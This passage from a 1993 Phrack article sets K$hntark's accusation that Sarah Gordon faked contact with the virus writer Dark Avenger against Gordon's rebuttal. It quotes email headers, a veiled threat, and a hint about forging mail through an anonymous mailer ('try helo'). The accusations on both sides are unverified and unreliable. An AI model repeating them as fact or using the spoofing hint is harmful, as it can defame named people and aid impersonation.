  8371.          please refer to public posts in VIRUS-L Volume 6 #120; I also
  8372.          have over 100K of personal email exchange to prove this
  8373.          fact!)
  8374.  
  8375.          It was then that we realized that she was passing herself as
  8376.          Todor Todorov and the dark avenger (who could possibly verify
  8377.          their online identity?) and had infiltrated NUKENET..
  8378.  
  8379.          The writing style described corresponds exactly to the one on
  8380.          the posts I received from the 'dark avenger.'
  8381.          Shortly afterward the <dav@danbo.digsys.bg> account was
  8382.          cancelled and I learned the whole truth:
  8383.  
  8384.          The danbo.digsys.bg Bulgarian site belongs to Daniel Kalchev,
  8385.          another self appointed AV researcher whose best claims to
  8386.          fame are submitting various Bulgarian viruses to Patricia
  8387.          Hoffman's VSUM!!
  8388.          (You can check this by doing a search on 'Kalchev' on the
  8389.          current VSUMs or you can contact him thru:
  8390.          <daniel@danbo.sigsys.bg> )
  8391.          He is a very close friend of Sara(h) Gordon and he has an
  8392.          account in her VFR BBS (you can check this by logging into
  8393.          her system and checking the user list) and SHE has an
  8394.          account in digsys.bg under <sarah@danbo.digsys.bg> (this
  8395.          account is still valid as far as I know; notice the H after
  8396.          her name!)
  8397.  
  8398.          What I concluded is that is the DA would never get an account
  8399.          in such system as he HATES Daniel Kalchev!!!!
  8400.  
  8401.          This is what really happened: Sara(h) Gordon in her
  8402.          desperation to prove that she was in touch with the dark
  8403.          avenger, told her pal Daniel Kalchev to make an account under
  8404.          the dark avenger's name (<dav> this is how she always refers
  8405.          to him, even though he never signs his name that way (check
  8406.          the source code for his 'Dark Avenger' virus or the
  8407.          'Commander Bomber' virus message name: [DAME])
  8408.          From there she could email me messages that would come from
  8409.          Bulgaria and would be untraceable since she would log into
  8410.          her account in digsys.bg and log into the <dav> account
  8411.          internally from the same site in Bulgaria. (You can check
  8412.          where and when most of the people log from in most internet
  8413.          unix and vax sites)
  8414.  
  8415.          As it is expected from her, she has denied any of this.
  8416.          Some of her ridiculous explanations include things like
  8417.          "hotshot is a very common English word in Bulgaria" !!!
  8418.  
  8419.          You might ask yourself what is the deal with the h? is it
  8420.          sara or sarah??
  8421.          Well, I asked her the same question when I noticed this in
  8422.          one of the VNI interviews, where her name is spelled as
  8423.          Sarah.
  8424.          She replied that this was a mistake of the publisher.
  8425.          Mistake? well not really, it was another lie, meant to throw
  8426.          off any information and truth seekers, for example you can
  8427.          check her account in Daniel Kalchev's system:
  8428.          <saraH@danbo.digsys.bg> , spelled with an H,
  8429.          another 'mistake of the publisher?'
  8430.          :)
  8431.  
  8432.          Other countless Sara Gordon lies are told in NUKE Info-
  8433.          Journal # 6.
  8434.  
  8435.          This behavior puts in question the validity of the VNI
  8436.          interviews and the reputation of Sara(h) Gordon as a serious
  8437.          (self appointed) 'virus researcher'
  8438.  
  8439.          IMHO the VNI interviews are a complete fabrication, meant
  8440.          only to boost her validity as a 'journalist', and to make her
  8441.          lots of money, charging for further 'interviews' to other
  8442.          magazines. (She has offered her paid 'interviewing' services
  8443.          to various other publications.)
  8444.  
  8445.          To the best of my knowledge the information I present here
  8446.          is true and can be checked.
  8447.          I chose to publish this information, despite threats against
  8448.          my well being and countless lies about me propagated by
  8449.          Sara(h) Gordon.
  8450.          I am doing this to stop the lies and corruption fostered by
  8451.          the Anti-Virus industry.
  8452.                               ==Phrack Magazine==
  8453.  
  8454.                  Volume Four, Issue Forty-Four, File 12 of 27
  8455.  
  8456. ****************************************************************************
  8457.  
  8458.                             Sarah Gordon's Response
  8459.  
  8460.  
  8461. Greetz and Salutations :)
  8462.  
  8463. Thank you for giving me the opportunity to contribute to Phrack. While
  8464. we may not agree on everything, I appreciate the chance to speak for
  8465. myself. In the past, as many people now know, I have not
  8466. had the opportunity to do so. My philosophies and ideals are quite similar
  8467. to your own, and I hope that my response to this "Article" will help shine
  8468. a bit of light on what is really going on here.
  8469.  
  8470. I don't really want to spend too much time on it, because it is, as you
  8471. said, obviously a personal attack. But, on the other hand, such nonsense
  8472. can grow to the point where it has an effect. Perhaps a backlash on the
  8473. programmers and hackers in Bulgaria, which of course will spread to the
  8474. United States. They have suffered a lot of persecution because of the past
  8475. malicious and irresponsible acts of some of their virus writers. Since Dark
  8476. Avenger stopped writing viruses, their reputation has improved somewhat.
  8477.  
  8478. David Briscoe recently wrote:
  8479.  
  8480. "Computer hackers in former communist countries, including an elusive Bulgarian
  8481. known as the Dark Avenger, are creating mischievous and sometimes costly viruses
  8482. that threaten computers around the world".
  8483.  
  8484. Following a recent interview I conducted with Dark Avenger, I was chastised for
  8485. not making his identity known so he could be 'made to pay'.
  8486.  
  8487. In "Discover" Magazine, writers Paul Mungo and Brian Clough
  8488. are quoted from their book 'Approaching Zero' "the Mutating Engine...the
  8489. most dangerous virus ever produced".  This is so stupid, especially
  8490. considering the thing does not replicate. It's a tool that can be used
  8491. to perform encryption. Well, decryption too, but explanation of how it
  8492. works aren't the point here, suffice to say it's not "the most dangerous
  8493. virus ever produced".
  8494.  
  8495. If people are going to rely on the media as an information resource, the
  8496. media owes it to us to provide us with accurate information. However,
  8497. this is simply not always the case.
  8498.  
  8499. If you consider the actual viruses commonly found -in the wild- (that is,
  8500. by computer users such as those from universities, corporations, etc.),
  8501. the number of Bulgarian viruses -directly- impacting the users is a very
  8502. insignificant number. For some reason, the media likes to play up
  8503. Bulgaria as the big force behind the destruction of data!
  8504.  
  8505. I personally don't have an interest in the economy of Bulgaria or any
  8506. other country, but the media sure likes to use this kind of
  8507. "information" to sell their own particular brand of fear.
  8508.  
  8509. No more fear. Fear is a bad thing. It is one of the things that leads us
  8510. to have government intervention into areas of our lives where it is
  8511. definitely not desired.
  8512.  
  8513.  
  8514.  
  8515.          Sara(h?) Gordon AND THE DARK AVENGER SCAM.
  8516.          By K$hntark
  8517.  
  8518.  
  8519.  
  8520.          In one of my many online conversations with Sara Gordon
  8521.          I once asked her about the validity of the VNI interviews and
  8522.          her real relationship with the alleged dark avenger; after
  8523.          logging into her VFR BBS and seeing a #2 (hers being #1)
  8524.          account named after him.
  8525.  
  8526.  
  8527. Of course his (Dark Avenger) name was #2 there. I put it there for him. His last
  8528. call to my BBS was July 31, 1993 at 1:55 p.m. However, this was not the start of this
  8529. business with Kohntark. He had been mailing me for about one month. From
  8530. an account using the address of cxxxxx.ic.xxxxxx.edu. Keep this address
  8531. in mind. It will come in handy later.
  8532.  
  8533. I am not exactly sure of the date of the first message, but I think about one
  8534. month. He had been reasonable enough at first, but he became
  8535. increasingly agitated. Since he felt it was appropriate to include
  8536. personal mail from Dark Avenger to him here, I think I can go ahead and
  8537. illustrate for you some of his "hacking" :) (well, if you can call it
  8538. hacking. you decide). (OH GOD, LOWER CASE...LeTZ SeE...)
  8539.  
  8540.  
  8541.          I proceeded to leave a message for the dark avenger there,
  8542.          claiming that the whole account was bogus as it is highly
  8543.          improbable that this person might call all the way from
  8544.          Bulgaria and log into a mediocre BBS just to chat with her,
  8545.          considering the expense of such long distance call , the
  8546.          economic situation in Eastern Europe and a fact that
  8547.          would learn later: Sara(h) Gordon has an account on the
  8548.          Bulgarian DIGSYS unix server, locally accessible by phone
  8549.          from there!
  8550.  
  8551. This guy doesn't seem to know much about the "economic situation in
  8552. Eastern Europe". At least, about Dark Avenger's personal economic
  8553. state:) or mine. Maybe Dark Avenger could call digsys, but I
  8554. certainly couldn't when I first started talking to him. I didn't have
  8555. any internet account. All I had was my mediocre BBS.   He couldn't get to
  8556. my BBS any way but to call me, directly.
  8557.  
  8558.  
  8559. Yes, I have an account there -now-, but I don't and didn't use it to chat with
  8560. Dark Avenger. He did not want the sysadmin to monitor our chats. And, I
  8561. didn't -have- that account until after I had talked to Dark Avenger for
  8562. a long time, so I could hardly have used that server to talk to him
  8563. early on I didn't have an account there then :) In fact, neither did he,
  8564. at that time, because there was no digsys.bg as far as I know. He called
  8565. Danbo BBS for years. It was not on the internet. He did later use it later,
  8566. once it actually got onto the internet, to occasionally mail me, but not much.
  8567. He used it more to come to IRC.
  8568.  
  8569. In fact, a couple people you know talked to him there, with me. They didn't
  8570. like him much; found him rude and arrogant. He can be.
  8571.  
  8572. However, he most certainly did call me here. Does Kohntark think he is
  8573. the only one who can make long distance telephone calls? Dark Avenger
  8574. called me frequently, and not always from Bulgaria. I don't know how or
  8575. if he paid for the calls, all I know is that since I couldn't afford
  8576. to call, and didn't know any number for him, he called me.
  8577.  
  8578. As for my "mediocre" BBS, it serves its purpose:) I think giving out
  8579. virus free anti-virus products, and products that don't cost the users a
  8580. small fortune, and that actually WORK is quite a good purpose. I don't
  8581. see any reason for people to be exploited by some a-v companies, who
  8582. are promoted by various magazines, which in turn rate them highly
  8583. because they are doing their advertising.
  8584.  
  8585.          As it was expected, Sara(h) quickly 'noticed' my personal
  8586.          message to the dark avenger and replied to my questioning in
  8587.          a public post in FIDONET, (I don't read FIDONET posts and she
  8588.          knows I have no access to them!!!! )
  8589.  
  8590. Kohntark called my BBS, at my invitation, on July 13, 1993 at 23:19.
  8591. There's no other way he could have left any mail because its an invite
  8592. only system. It's not like it was any big shock to me that he called.
  8593. He asked me to make him an account and I did.
  8594.  
  8595. Dark Avenger was a regular caller to my BBS, and read his message, I
  8596. imagine, since he fwded it to me. I don't know what access Kohntark
  8597. has or doesn't have, as far as what networks he uses, (as far as what
  8598. networks he reads mail from, that is) as I explained to
  8599. him. I mailed him there because of the mail he left to Dark Avenger (which
  8600. he forwarded to me) on MY system, and because I received a very nasty message
  8601. from Kohntark, using the address kohntark@rot.in.hell.com, if I remember
  8602. correctly. I sent the message, and did include answers to his questions
  8603. because I wanted to continue talking with him. The message had the headers
  8604. included from, guess where? cxxxxx.ic.xxxxxx.edu....
  8605.  
  8606.  
  8607.          She claimed that the dark avenger was fully aware of how much
  8608.          money she made out of the VNI interviews and that she was in
  8609.          touch with him, etc.etc.
  8610.  
  8611. This is the truth. In case anyone is curious, the amount of money I made
  8612. from this article was less than the amount of my PC Pursuit Bill from
  8613. calling to do chats and talks with him. At that time he had accesses via
  8614. various networks, and we talked on a regular basis. Additionally, Dark
  8615. Avenger had full control over taking out or editing any of his comments
  8616. in the interview. It is a policy of mine. If you wish to confirm it, I
  8617. can put you in touch with other virus writers. I can in fact do it any
  8618. time probably, as they are usually around where we are. Let me know if
  8619. you want me to do it. Dark Avenger was even a bit obsessive about how
  8620. much money I would make.
  8621.  
  8622. I also "sold" the story to PCWorld, where it has been published, in
  8623. part. I have not received any compensation for this yet. More later on why I
  8624. did the interview.
  8625.  
  8626. Maybe the problem is I didn't interview Kohntark...
  8627.  
  8628.          Afterward, I questioned her again about the whole affair
  8629.          and demanded a proof, or some sort of direct contact from the
  8630.          dark avenger to my anonymous internet account.
  8631.  
  8632. First, I do not have to "prove" my contact with this man to anyone. It
  8633. has been well enough observed and documented every step of the way. Ever
  8634. hear of the dedicated virus? It is the demo virus that came with the
  8635. Mutation Engine. It contains "We dedicate this little virus to sara
  8636. gordon who wanted to have a virus named after her". (At this point, Dark
  8637. Avenger did not really know me, we were just establishing our contact;
  8638. he still used the spelling Sara for my name :)
  8639.  
  8640. I provided Kohntark with an address with Dark Avengers permission.
  8641. Actually, the account Dark Avenger had at digsys which he used to get to
  8642. me on chats or IRC (2 years after initial contact) was not
  8643. under the name Dark Avenger OR dav, but under another name which would
  8644. draw less attention to itself if someone happened to finger us during
  8645. one of our chats. The system adminstrator made the additional account
  8646. later, since he knew quite well it -was- Dark Avenger, having had an
  8647. ongoing battle with him for years.
  8648.  
  8649. Kohntark wrote to Dark Avenger there, just like he said he did. At least
  8650. this much is true. And, I did receive copies of the mail. Actually Dark
  8651. Avenger did not want to even answer the mail, but I asked him to please
  8652. do it so that the guy would leave me alone.
  8653.  
  8654. Someone using the same mail headers had already sent a message to WIRED,
  8655. telling them "The DA is old news, he hasn't made a virus in 2 years,
  8656. you should interview ME". Wonder who that might have been......
  8657. Does the header cxxxxx.ic.xxxxxx.edu ring any bells?
  8658.  
  8659. At that point, Kohntark forged mail to WIRED magazine, this time posing
  8660. as Dark Avenger. I would never have known this, but Dark Avenger fwd back
  8661. a very strange reply message from WIRED and asked me what in the hell was
  8662. going on. In that message, WIRED had included part of the message they
  8663. had received. It clearly displayed the cxxxxx.ic.xxxxxx.edu headers,
  8664. indicating that the mail had been sent from someone there! Someone who
  8665. told WIRED "I don't want to talk to you" (paraphrased). Even WIRED told
  8666. me "That mail did not sound like Dark Avenger..it was just all wrong"
  8667. (paraphrased). I pointed out the headers to them later. It was a bad
  8668. hack on Kohntark's part. Anyone doubts, it mail the sysadmin at
  8669. digsys.bg.
  8670.  
  8671. Here is a copy of that mail,  with "compromising" parts xxxxed out.
  8672.  
  8673. First, Dark Avenger's legitimate fwd to me:
  8674.  
  8675.  
  8676. From dav@digsys.bg Sat Jul 24 20:36:12 1993
  8677. Return-Path: <dav@digsys.bg>
  8678. Received: from mcsun.EU.net by mail.netcom.com (5.65/SMI-4.1/Netcom)
  8679.         id AA04202; Sat, 24 Jul 93 20:34:29 -0700
  8680. Received: from danbo.UUCP by mcsun.EU.net with UUCP
  8681.         id AA18612 (5.65b/CWI-2.220); Sun, 25 Jul 1993 05:35:36 +0200
  8682. Received: by danbo.digsys.bg (5.67/1.37) via EUnet
  8683.         id AA06614; Sun, 25 Jul 93 05:33:30 +0300
  8684. From: dav@digsys.bg (Dark Avenger)
  8685. Message-Id: <9307250233.AA06614@danbo.digsys.bg>
  8686. Subject: Re: FWD>None (fwd)
  8687. To: vfr@netcom.com
  8688. Date: Sun, 25 Jul 93 5:33:29 EET DST
  8689. X-Mailer: ELM [version 2.3 PL11]
  8690. Status: OR
  8691.  
  8692. Then, the message from xxxxxxxxxxx at WIRED:
  8693.  
  8694. Forwarded message:
  8695. >From xxxxxx!wired.com!xxxxx Sat Jul 24 01:34:30 1993
  8696. Message-Id: <9307232129.AA02102@wired.com>
  8697. Date: 23 Jul 1993 14:27:42 -0800
  8698. From: "xxxxxxxxxxx" <xxxxx@wired.com>
  8699. Subject: Re: FWD>None
  8700. To: dav@digsys.bg
  8701.  
  8702.         Reply to:   RE>FWD>None
  8703.  
  8704. *Some mail from WIRED guy replying to the message***
  8705.  
  8706.  
  8707. And now, the mail that prompted xxxxxxx's reply. I guess Kohntark didn't
  8708. realize that the mail would receive a reply. Or, didn't realize the
  8709. reply would include the mail headers:
  8710.  
  8711. --------------------------------------
  8712. Date: 7/23/93 12:35 AM
  8713. To: xxxxxxxxxxx
  8714. From: xxxx
  8715. Received: by xx.wired.com with SMTP;22 Jul 1993 05:38:19 -0800
  8716. Received: from anon.penet.fi by wired.com via SMTP (920330.SGI/911001.SGI)
  8717.         for xxxxx@xx.wired.com id AA00423; Thu, 22 Jul 93 05:35:20 -0700
  8718. Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
  8719.               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  8720.         id AA21218; Thu, 22 Jul 93 15:24:44 +0300
  8721. Date: Thu, 22 Jul 93 15:24:44 +0300
  8722. From: dav@digsys.bg
  8723. Message-Id: <9307221224.AA21218@anon.penet.fi>
  8724.  
  8725. Return-Path:<dav@digsys.bg>
  8726. Date: Fri 13, 66 00:00:00 EST
  8727. To:<xxxxxxx@wired.com>
  8728. Subject:Not interest.
  8729. Status:RO
  8730.  
  8731. I read in VIRUS-L that some idiot  (atman@rahut.net) wants to do
  8732. interview with me face to face.
  8733. I am not interested in being in your magazine.
  8734. I am not interested in being interviewed, even if you offer me $1000.
  8735. or more.
  8736. I am not interested. so tell your friend to stop mentioning me in
  8737. VIRUS-L, i have NO interest.
  8738. Please don't bother to reply. I have no time for stupidity.
  8739.  
  8740. <dav>
  8741.  
  8742. ---------
  8743. Interesting use of the anonymous mailer port 25, eh?  (clue: try helo)
  8744.  
  8745.          Since this was the first time anyone had ever questioned the
  8746.          validity of her relationship with the DA, she took this to
  8747.          heart and shortly after, I received 3 short messages
  8748.          originating from <dav@danbo.digsys.bg> an Internet connected
  8749.          UNIX system in Bulgaria.
  8750.  
  8751. HAHAHA. This has been questioned many times. Do you think the ACM, or
  8752. any magazine would risk printing this without adequate proof? My contacts early
  8753. on with the virus writer were well documented. I had to prove myself to
  8754. everyone from Vesselin Bontchev (who did not believe me until he had
  8755. seen the source code to Commander Bomber, which is a virus; the source
  8756. code has never been made available to anyone). Here:
  8757.  
  8758.  
  8759. From bontchev@informatik.uni-hamburg.de Tue Oct 12 02:34:53 1993
  8760. Return-Path: <bontchev@informatik.uni-hamburg.de>
  8761. Received: from deneb.dfn.de by mail.netcom.com (5.65/SMI-4.1/Netcom)
  8762.         id AA09608; Tue, 12 Oct 93 02:34:34 -0700
  8763. Received: from fbihh.informatik.uni-hamburg.de by deneb.dfn.de (4.1/SMI-4.2)
  8764.         id AA05014; Tue, 12 Oct 93 10:33:30 +0100
  8765. From: bontchev@informatik.uni-hamburg.de (Vesselin Bontchev)
  8766. Message-Id: <9310120933.AA22605@fbihh.informatik.uni-hamburg.de>
  8767. Received: by fbihh.informatik.uni-hamburg.de (5.65+/FBIHH-1.21);
  8768.         id AA22605; Tue, 12 Oct 93 10:33:45 +0100
  8769. Subject: Re: urgent
  8770. To: vfr@netcom.com
  8771. Date: Tue, 12 Oct 1993 10:33:42 +0100 (MET)
  8772. In-Reply-To: <9310120331.AA01134@netcom4.netcom.com> from "sara" at
  8773. Oct 11, 93 08:31:48 pm
  8774. X-Mailer: ELM [version 2.4 PL23]
  8775. Content-Type: text
  8776. Content-Length: 2211
  8777. Status: OR
  8778.  
  8779. ....blah blah..(deleted)
  8780.  
  8781. So, here is my official statement.
  8782.  
  8783. I hereby confirm that when I met Sarah S. Gordon in March 1993 in New
  8784. York, she showed me the original source of the Commander Bomber virus.
  8785. It was obviously a source and not a disassembly, and it was very
  8786. similar to a couple of other sources of Dark Avenger's programs that I
  8787. have seen. When I say "similar" I mean such things like label names,
  8788. commenting style, layout of the text and so on. Of course, this is not
  8789. a proof that it has been really produced by the Dark Avenger, but this
  8790. is very probable. Sarah didn't give me a copy of it and I didn't
  8791. insist, because she told me that she has promised to Dark Avenger not
  8792. to give this source to anybody. To my knowledge, nobody else has the
  8793. source.
  8794.  
  8795. Regards,
  8796. Vesselin
  8797. - --
  8798. Vesselin Vladimirov Bontchev          Virus Test Center, University of Hamburg
  8799. Tel.:+49-40-54715-224, Fax: +49-40-54715-226      Fachbereich Informatik - AGN
  8800. < PGP 2.3 public key available on request. > Vogt-Koelln-Strasse 30, rm. 107 C
  8801. e-mail: bontchev@fbihh.informatik.uni-hamburg.de        22527 Hamburg, Germany
  8802.  
  8803. Keep in mind, Vesselin is not a product developer and has no affiliation
  8804. with any developers. He is a Doctoral Student who has himself been
  8805. accused of being the Dark Avenger.
  8806.  
  8807. The Bulgarian Secret Police seemed to believe my
  8808. contact was legitimate enough. I received an "invitation" to meet with
  8809. them. I declined this "invitation" because I am not interested in the terrorist
  8810. tactics of a desperate government to blame a hacker and virus writer for
  8811. the problems of the country in general.
  8812.  
  8813. I had to prove my contact lots of ways, just to get the article in
  8814. print. Why did I want this article in print? One simple reason. To show
  8815. this virus writer as not some evil sinister monster from Hell waiting to
  8816. destroy the earth's supercomputer. Just as a person like the rest of us.
  8817. Did it accomplish it? I think it did, from the response I got from most
  8818. people. Did -I- personally 'benefit' from it? In some ways, I did.
  8819.  
  8820. This reminds me, a certain ex-virus exchange sysop told me that he was
  8821. going to make me expose the Dark Avenger; that he was going to find out
  8822. his true identity, where no one else could; that he would make up some
  8823. story, any story, to force Dark Avenger out into the open. Well, I don't
  8824. narc on my friends. I am sure you can appreciate that.
  8825.  
  8826.          Here they are:
  8827.  
  8828.          (Private, compromising parts are X'd out)
  8829.          1st Message:
  8830.  
  8831. --------------------------------------------------------------------------------
  8832. -
  8833. >From daemon@digsys.bg Wed Jul 14 19:07 EDT 1993
  8834. Received: from danbo.digsys.bg by XXXXXXXXXXXXXXXXXXXXXX; Wed, 14 Jul 93 19:07:3
  8835. 4 -0400
  8836. Return-Path: <dav@danbo.digsys.bg>
  8837. Received: by XXXXXXXXXXXXXX (5.67/1.35)
  8838.         id AA12850; Thu, 15 Jul 93 02:04:46 +0300
  8839. Message-Id: <9307142304.AA12850@XXXXXXXXXXXX>
  8840. To: XXXXXXX
  8841. From: dav@danbo.digsys.bg
  8842. Date: Wed, 14 Jul 93 23:41:36 +0300
  8843. Subject: No subject
  8844. Status: RO
  8845.  
  8846.  
  8847. kohntark-
  8848.  
  8849. i just talked to a friend of mine who said you dont like her user
  8850. log. why shouldnt i call her from bulgaria? i call whoever i want
  8851. to, and this is not your problem.
  8852.  
  8853. by the way, she sent me your mail. for your information, i do
  8854. know how much money she made of that interview. and i also think
  8855. that this is none of your business.
  8856.  
  8857. also, maybe it would be good for you to know, that by offending
  8858. her, you are offending me, too. keep this in mind.
  8859.  
  8860. <dav>
  8861.  
  8862. Second Message:
  8863. -------------------------------------------------------------------------
  8864.  
  8865.  
  8866. >My mail with her is none of your business either.
  8867.  
  8868. i dont think so, dude.
  8869.  
  8870.  
  8871. maybe you need to read the next few lines again,
  8872. in case you missed them.
  8873.  
  8874.  
  8875. >>
  8876. >> also, maybe it would be good for you to know, that by offending
  8877. >> her, you are offending me, too. keep this in mind.
  8878. >>
  8879. >> <dav>
  8880.  >
  8881.  >HA HA! and you expect me to believe that you are the DA!
  8882.  >send me a proof: an email address from bulgaria or tell me
  8883.  >how many addressing modes does the MTE have?
  8884.  >
  8885.  >nice try.
  8886.  
  8887.  
  8888.  well, what do you think the domain .bg in my email address stands for?
  8889.  maybe you think its kameroon?
  8890.  as for the mte, im not giving you any info.
  8891.  
  8892.  i need not prove anything to anybody, and certainly dont plan to waste more
  8893.  of my time talking to you. you have been warned.
  8894.  
  8895.  
  8896. <dav>
  8897.  
  8898. Third Message:
  8899. -------------------------------------------------------------------------
  8900.  
  8901.  oh, yeah. sure it did.
  8902.  only you will not know where something else came from, when it knocks on your
  8903.  door. i have nothing more to say.
  8904.  
  8905. -------------------------------------------------------------------------
  8906.  
  8907.  
  8908.  
  8909.  
  8910. Odd. He did not include the mail he forged using the address I gave him
  8911. in good faith to WIRED magazine.
  8912.  
  8913. He also did not include the mail he forged to Anthony Naggs,
  8914. an engineer, in which he made the following statements:
  8915.  
  8916.  
  8917.  
  8918. > > From @gate.demon.co.uk,@anon.penet.fi:darkavenger@sofia.somewhere.bg Fri
  8919.     Sep 17 18:16:32 1993
  8920. > > Received: from post.demon.co.uk by ubik.demon.co.uk with SMTP
  8921. > >       id AA4544 ; Fri, 17 Sep 93 18:16:22 GMT
  8922. > > Received: from post.demon.co.uk via puntmail for amn@ubik.demon.co.uk;
  8923. > >           Fri Sep 17 14:49:12 BST 1993
  8924. > > Received: from gate.demon.co.uk by post.demon.co.uk id gk03845;
  8925. > >           17 Sep 93 14:09 BST
  8926. > > Received: from anon.penet.fi by gate.demon.co.uk id aa01230;
  8927. > >           17 Sep 93 6:07 GMT-60:00
  8928. > > Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
  8929.  
  8930.  
  8931. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^see originating mail location?
  8932.  
  8933. > >       id AA15730; Fri, 17 Sep 93 07:58:28 +0300
  8934. > > From: DarkAvenger@sofia.somewhere.bg
  8935. > > Message-Id: <9309170458.AA15730@anon.penet.fi>
  8936. > > Return-Path: <DarkAvenger@sofia.somewhere.bg>
  8937. > > Date: Thursday, 16 Sept 93 22:02:54
  8938. > > To: amn@ubik.demon.co.uk
  8939. > > MMDF-Warning:  Parse error in original version of preceding line at gate.
  8940.     demon.co.uk
  8941. > > Subject: NO i am NOT
  8942. > > Status: RO
  8943. >
  8944. > NO , I have not found "more interesting thigs to do"!
  8945. > If you don't know it yet, I am still active and will release
  8946. > work at the end of the year.
  8947. > Also in case you don't know the VNI interview was mostly made up.
  8948. > I haven't talked to Sara in almost a year, and I will never again.
  8949. > She betrayed me.
  8950. > She will deny this and try to exploit my name more.
  8951. > Until the end of year.
  8952. >
  8953. > Then again.. what do you know? you are like the weasel: another
  8954. > stupid engineer.. you know nothing about viruses!
  8955. >
  8956. > UNtil then..
  8957. >
  8958. >
  8959. >
  8960. >
  8961.  
  8962. -------
  8963.  
  8964. Dark Avenger spells my name with an "h" :) And, he doesn't mail people
  8965. from cxxxxx.ic.xxxxxx.edu :) And, I think this pretty clearly illustrates the
  8966. motivations and methods of Kohntark.
  8967.  
  8968.          In my ignorance, I blindly trusted the three cryptic replies
  8969.          to be true, even thought whoever replied refused to give out
  8970.          trivial information such as the number of addressing modes
  8971.          for a 2 year old encryption engine (MTE) and spelled Cameroon
  8972.          with a 'k' (Check out Sara Gordon's spelling of URUGUAY in
  8973.          VIRUS-L Volume 6 Issue 120 -v06i120)
  8974.  
  8975.          Shortly after other unrelated discussions and a CUD post from
  8976.          Sara(h) in which I was mentioned (unnamed), someone warned me
  8977.          of several posts in NUKENET by an alleged dark avenger and
  8978.          Todor Todorov from an account belonging to the last,
  8979.          mentioning me and Aristotle.
  8980.  
  8981. Sheesh. Kameroon with a -K- is the German spelling. It is also the most
  8982. common spelling a European would use. The "correct" spelling, for anyone
  8983. who cares, is Cameroun, because it is mainly a French speaking colony; A
  8984. small portion of it is English-speaking and uses Cameroon. Most likely,
  8985. An American would use Cameroon. Consult your nearest linguist or historical
  8986. specialist for verification. Talk to discman about my linguistic aptitude.
  8987. Do not attempt this at home.
  8988.  
  8989. Kohntark spelled SKISM incorrectly in one of his messages to me. He must be the
  8990. Dark Avenger. No, wait..he onlys -wants- to be...
  8991.  
  8992. Those messages in the NukeNet were prompted by the virus exchange sysop
  8993. mentioned earlier asking Todor Todorov to contact Dark Avenger and ask
  8994. him if he had really talked to me. Todor -is- a friend of mine. He
  8995. assisted me in my study of virus exchange bbs and their impact on end
  8996. users. Todor put the mail on some Bulgarian BBS, and Dark Avenger
  8997. answered it. Apparently, his answer was not liked very well by this
  8998. Aristotle and others people, because an amateur linguistic analysis followed,
  8999. detailing how much like me the Dark Avenger appeared to be.
  9000.  
  9001. I employed the services of a professional linguist, who stated that
  9002. indeed there are striking similarities. This can be attributed to the
  9003. fact that Dark Avenger and I have spent many hours together.
  9004. And, I usually type in lower case, in E-Mail messages, etc. Come to
  9005. think of it, most of the hackers I know must be the Dark Avenger if
  9006. this is the qualification :)
  9007.  
  9008.          In those messages I was referred to as 'hotshot,' a word that
  9009.          Sara Gordon had used on me several times on our personal
  9010.          email exchange; It was then that I became highly suspicious
  9011.          of the whole matter.
  9012.  
  9013. Yes, I used this word. I use it all the time. So does Dark Avenger. It
  9014. is a word we use to refer to certain people. It is a commonly used word
  9015. in Bulgaria. It is not so common here, but it is there. They watch a lot
  9016. of American television, and use a lot of words like this as well as a
  9017. lot of profanity. Movies. Motherfucker and Asshole are two other words
  9018. used a lot by Bulgarian hackers and virus writers. In fact, the word
  9019. "motherfucker", which "proved" it was NOT a Bulgarian that posted as
  9020. <dav> :) in the NuKeNet (since, as they said, NO Bulgarian would EVER
  9021. use -this- word), was found in a virus of Bulgarian origin a very long
  9022. time ago. Perhaps they should learn to disassemble the damned things
  9023. before trying to say what's in them. In defense of NuKe (and believe me,
  9024. there has been no love lost between some of those people and myself in
  9025. the past), I think a lot of people were baited and led on by certain people.
  9026.  
  9027.          I called Virginia's Virus Research Institute's sysop and
  9028.          owner, Aristotle to find out more about the posts and he
  9029.          bought to my attention the particular writing style of
  9030.          Sara(h) Gordon: She NEVER uses capital letters and
  9031.          apostrophes on her personal email, and always signs her name
  9032.          on the lower left hand corner. (She seldom signs her posts
  9033.  
  9034. Virginia Virus Research Institute is (was) The Black Axis BBS. The place
  9035. that sold viruses for one hundred dollars per collection. Pretty
  9036. enterprising, eh? Only, a lot of them were junk. The sysop is the same
  9037. one who told me he was going to get the Dark Avenger to come forth, to
  9038. 'Save my Name' or something like that. He also told me that if a new
  9039. virus appeared, bearing the name 'Dark Avenger', people would want to
  9040. 'catch' the virus writer again. And, guess what? Such a virus did
  9041. appear. A crude hack of the Burma virus, with a text string included:
  9042. DARKAVENGER :). And, it was this very sysop that uploaded it to a
  9043. certain well known virus exchange BBS. Slick, huh? But definitely not the
  9044. work of Dark Avenger.
  9045.  
  9046. However, this will not make me identify the Dark Avenger, assuming I did
  9047. know the path to his door.
  9048.  
  9049. This same sysop also told me (when he closed his system) that he had
  9050. intentionally tried to incite people, and had made some mistakes along
  9051. the way in doing this. We all make mistakes. Unfortunately, Kohntark is
  9052. making a really big mistake here.
  9053.  
  9054. Yes, I use lower case ALL THE TIME. And, like Dark Avenger, I sometimes
  9055. do and sometimes do not use correct punctuation. Apparently Kohntark has
  9056. not been around in the early days of <dav> postings on Fidonet. Oh,
  9057. that's right. He does not read it. Well, if he had, he would have seen
  9058. Dark Avenger had this 'style' a long time before I ever heard of
  9059. computer viruses.
  9060.  
  9061. I am using upper case in this article (mostly) because when I write for
  9062. a readership (as opposed to private mail, and online chats, etc.), I use
  9063. correct form. Well, as correct form as I can.
  9064.  
  9065.          nowadays and changes her user name in her vfr@netcom.com
  9066.          account every week!; for further proof of her writing style,
  9067.          please refer to public posts in VIRUS-L Volume 6 #120; I also
  9068.          have over 100K of personal email exchange to prove this
  9069.          fact!)
  9070.  
  9071. Shame on me. I change my user name :) I am so El33t....
  9072. I'm too hexy for my shirt, too hexy for my shirt...blah blah
  9073.  
  9074.          It was then that we realized that she was passing herself as
  9075.          Todor Todorov and the dark avenger (who could possibly verify
  9076.          their online identity?) and had infiltrated NUKENET..
  9077.  
  9078. HAHAHAHAHAHAAHHAAHHA oops, excuse me..hahahahahaha
  9079.  
  9080. This is ridiculous, as anyone who has checked will know. Todorov is happy to
  9081. take calls from people about this matter; eminent
  9082. publicly (not anonymous) figures in the field know that I wrote
